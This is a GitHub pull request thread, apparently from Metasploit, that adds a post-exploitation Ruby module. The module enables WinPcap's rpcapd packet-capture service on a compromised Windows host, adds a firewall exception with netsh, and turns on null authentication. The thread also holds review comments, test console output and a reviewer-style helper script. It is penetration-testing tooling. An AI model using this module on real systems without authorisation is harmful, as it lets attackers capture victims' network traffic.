Post windows module to start rpcapd service (active/passive mode) #761

Merged
merged 3 commits into from

3 participants

Borja Merino Juan Vazquez James Lee
Borja Merino

The module enables the Remote Packet Capture System (rpcapd service) included in the default installation of Winpcap. The module allows you to set up the service in passive or active mode (useful if the client is behind a firewall).

modules/post/windows/manage/rpcapd_start.rb
((27 lines not shown))
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
+ 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
James Lee Collaborator
jlee-r7 added a note

Modules should not run getsystem. Check for necessary privileges and tell the user if they need to run it.

modules/post/windows/manage/rpcapd_start.rb
((35 lines not shown))
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
+ OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
James Lee Collaborator
jlee-r7 added a note

Artificial restriction. This is a fairly simple task that should work just fine on java or a shell session.

modules/post/windows/manage/rpcapd_start.rb
((88 lines not shown))
+ print_good("Got System")
+ return true
+ else
+ print_error("Couldn't get System")
+ return false
+ end
+ elsif !is_admin? and datastore['GETSYSTEM']==false
+ return false
+ else # is_admin? = true
+ return true
+ end
+ end
+
+ def run_rpcapd(p)
+ begin
+ client.sys.process.execute("cmd.exe /c sc config rpcapd binpath= \"#{p}\" ",nil, {'Hidden' => 'true', 'Channelized' => true})
James Lee Collaborator
jlee-r7 added a note

You should avoid process.execute when cmd_exec will do (i.e., unless you need to use a token). Using process.execute means this can't run on a shell session.

modules/post/windows/manage/rpcapd_start.rb
((109 lines not shown))
+ print_status("Rpcapd is already running. Restarting service ...")
+ if service_stop("rpcapd") and service_start("rpcapd")
+ print_good("Service restarted successfully: #{p}")
+ else
+ print_error("There was an error restarting rpcapd.exe. Try to run it again")
+ end
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+
+ def fw_enable(prog)
+ print_status ("Enabling rpcapd.exe in Windows Firewall")
+ begin
+ if (client.fs.file.exists?(prog))
James Lee Collaborator
jlee-r7 added a note

Use the methods from Post::File, which are platform- and session-type-independent.

modules/post/windows/manage/rpcapd_start.rb
((44 lines not shown))
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=client.fs.file.expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
James Lee Collaborator
jlee-r7 added a note

Use expand_path from the Post::File mixin instead.

Borja Merino

Hi @jlee-r7 thanks for all the explanations

Juan Vazquez
Collaborator

Tested successfully:

msf  exploit(handler) > use post/windows/manage/rpcapd_start 
msf  post(rpcapd_start) > show options

Module options (post/windows/manage/rpcapd_start):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.

msf  post(rpcapd_start) > show sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.1.129:4444 -> 192.168.1.147:1743 (192.168.1.147)

msf  post(rpcapd_start) > set SESSION 1
SESSION => 1
msf  post(rpcapd_start) > run

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed

After that I'm able to connect to the remote interface on port 2002 and capture traffic from a remote host.
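An added example, not code from this PR or from the Metasploit module: a small Ruby helper that assembles the rpcapd command line and the `sc config` argument the way the module does, but with three changes a reviewer would ask for. The executable path is quoted, so the registered ImagePath does not end up as the unquoted `C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n` shown in the output above (sc strips the outer quotes of `binpath=`); active mode refuses to build a command line without RHOST; and the integer that `service_start` returns is mapped to a symbol instead of being used as a boolean. The install path constant and the meaning of the 0/1 return codes are assumptions taken from the module's defaults and its `case result` branch.

```ruby
require 'ipaddr'

# Added example, not the module's code: builds what the module passes to
# `sc config rpcapd binpath=` and to service_start, with the executable
# path quoted and the inputs validated before anything touches the host.
module RpcapdCmd
  # Assumption: WinPcap's default install location, as used by the module.
  DEFAULT_EXE = 'C:\Program Files\winpcap\rpcapd.exe'

  # rpcapd arguments for the requested mode.
  #   passive:  listen on PORT (needs an inbound firewall exception)
  #   active:   connect out to RHOST,PORT (no inbound rule needed)
  #   nullauth: append -n so no local account is required to capture
  def self.build(active:, port:, rhost: nil, nullauth: true, exe: DEFAULT_EXE)
    raise ArgumentError, "PORT out of range: #{port.inspect}" unless (1..65_535).cover?(port)

    if active
      raise ArgumentError, 'RHOST must be set in active mode' if rhost.nil? || rhost.to_s.empty?
      IPAddr.new(rhost) # raises IPAddr::InvalidAddressError on a bad address
      args = "-d -a #{rhost},#{port} -v"
    else
      args = "-d -p #{port}"
    end
    args += ' -n' if nullauth
    # Quote the exe path itself so the registered ImagePath is not an
    # unquoted path containing a space ("C:\Program Files\...").
    %("#{exe}" #{args})
  end

  # Argument string for `sc config rpcapd binpath= ...`. sc strips the outer
  # quotes, so quotes that must survive into ImagePath are escaped as \".
  def self.sc_config_args(cmdline)
    escaped = cmdline.gsub('"') { '\"' }
    %(config rpcapd binpath= "#{escaped}")
  end

  # Assumption (from the module's `case result` branch): service_start
  # returns 0 when the service started and 1 when it was already running.
  # Mapping to a symbol avoids treating the integer as a boolean, since
  # both 0 and 1 are truthy in Ruby.
  START_CODES = { 0 => :started, 1 => :already_running }.freeze

  def self.start_result(code)
    START_CODES.fetch(code, :error)
  end
end

if $PROGRAM_NAME == __FILE__
  cmd = RpcapdCmd.build(active: false, port: 2002)
  puts cmd
  puts RpcapdCmd.sc_config_args(cmd)
end
```

Run stand-alone it prints the passive-mode command line and the matching `sc config` argument; `sc_config_args` is what you would hand to `cmd_exec("sc", ...)`, and `start_result` is how the `service_stop ... and service_start ...` restart check would read if it compared return codes instead of relying on truthiness.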

Borja Merino

@jvazquez-r7 Thank you so much for checking it out

modules/post/windows/manage/rpcapd_start.rb
((49 lines not shown))
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+ if reg != 2
+ print_status("Setting rpcapd as 'auto' service")
+ service_change_startup("rpcapd","auto")
+ end
+ if datastore['ACTIVE']==true
+ print_error("RHOST is not set ") if datastore['RHOST']==nil
+ p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
Juan Vazquez Collaborator

As @jlee-r7 has pointed out, it could happen that RHOST is nil. That doesn't seem to make sense when running in active mode, does it?

If RHOST is always needed to run in active mode, then in case of RHOST being nil, just print_error to warn the user and return.

Thanks @jlee-r7 for keeping on pointing these out!

modules/post/windows/manage/rpcapd_start.rb
((17 lines not shown))
+ include Msf::Post::Windows::Registry
+ include Msf::Post::Windows::WindowsServices
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Common
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Enable Remote Packet Capture Service',
+ 'Description' => %q{
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
Juan Vazquez Collaborator

Can MSF_LICENSE be used? Or would you like to use BSD_LICENSE?

Borja Merino

@jvazquez-r7 Yes, of course MSF_LICENSE. I was wrong to write it, and I've just seen that I also put BSD_LICENSE in the safe delete (sdel). Could you please change it?

Thank you

Juan Vazquez
Collaborator

@bmerinofe sure I can change the license type for you when merging, no problem! :)

Is there any response for the comment about the RHOST being nil in the active mode? (see above :) )

Juan Vazquez
Collaborator

Awesome, looks good and works as expected, merging!

msf  post(rpcapd_start) > show options

Module options (post/windows/manage/rpcapd_start):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.

msf  post(rpcapd_start) > set session 1
session => 1
msf  post(rpcapd_start) > rexploit
[*] Reloading module...

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed
msf  post(rpcapd_start) > set ACTIVE true
ACTIVE => true
msf  post(rpcapd_start) > rexploit
[*] Reloading module...

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[-] RHOST is not set 
[*] Post module execution completed

Juan Vazquez jvazquez-r7 merged commit cdd9eb1 into from
Commits on Sep 5, 2012
  1. Borja Merino
Commits on Sep 7, 2012
  1. Borja Merino

    Applying changes

    BorjaMerino authored
Commits on Nov 28, 2012
  1. Borja Merino
Showing with 117 additions and 0 deletions.
  1. +117 −0 modules/post/windows/manage/rpcapd_start.rb
117 modules/post/windows/manage/rpcapd_start.rb
@@ -0,0 +1,117 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/post/file'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'msf/core/post/windows/services'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Windows::Registry
+ include Msf::Post::Windows::WindowsServices
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Common
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Enable Remote Packet Capture Service',
+ 'Description' => %q{
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ if is_admin?
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+ if reg != 2
+ print_status("Setting rpcapd as 'auto' service")
+ service_change_startup("rpcapd","auto")
+ end
+ if datastore['ACTIVE']==true
+ if datastore['RHOST']==nil
+ print_error("RHOST is not set ")
+ return
+ else
+ p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
+ print_status("Installing rpcap in ACTIVE mode (remote port: #{datastore['PORT']})")
+ end
+ else
+ fw_enable(prog)
+ print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ")
+ p = prog << " -d -p #{datastore['PORT']} "
+ end
+ if datastore['NULLAUTH']==true
+ p<< "-n"
+ end
+ run_rpcapd(p)
+ end
+ else
+ print_error("You don't have enough privileges. Try getsystem.")
+ end
+ end
+
+ def run_rpcapd(p)
+ begin
+ cmd_exec("sc","config rpcapd binpath= \"#{p}\" ",30)
+ result=service_start("rpcapd")
+ case result
+ when 0
+ print_good("Rpcapd started successfully: #{p}")
+ when 1
+ print_status("Rpcapd is already running. Restarting service ...")
+ if service_stop("rpcapd") and service_start("rpcapd")
+ print_good("Service restarted successfully: #{p}")
+ else
+ print_error("There was an error restarting rpcapd.exe. Try to run it again")
+ end
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+
+ def fw_enable(prog)
+ print_status ("Enabling rpcapd.exe in Windows Firewall")
+ begin
+ if file_exist?(prog)
+ cmd_exec("netsh","firewall add allowedprogram \"#{prog}\" \"Windows Service\" ENABLE ",30)
+ else
+ print_error("rpcad.exe doesn't exist in #{prog}. Check the installation of WinPcap")
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+end
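Review bot: `cmd_exec("sc","config rpcapd binpath= \"#{p}\" ",30)` in run_rpcapd registers an unquoted ImagePath. sc consumes the outer quotes around `#{p}`, so the service is stored as `C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n` exactly as the test output shows, and the space in `Program Files` leaves an unquoted service path. Quote the executable on its own before appending the arguments, e.g. `binpath= "\"#{prog}\" -d -p #{datastore['PORT']}"`, escaping the inner quotes so they survive into the registry. Separately, the restart branch `if service_stop("rpcapd") and service_start("rpcapd")` can never take its else path: the `case result` just above treats 0 as success, so service_start returns an integer, and every integer is truthy in Ruby; compare both return values to 0 explicitly. Minor: the `rescue ::Exception` handlers report failures with print_status, where print_error would flag them as errors, and the description could state that NULLAUTH defaults to true, meaning anyone who can reach PORT can capture once the firewall exception has been added.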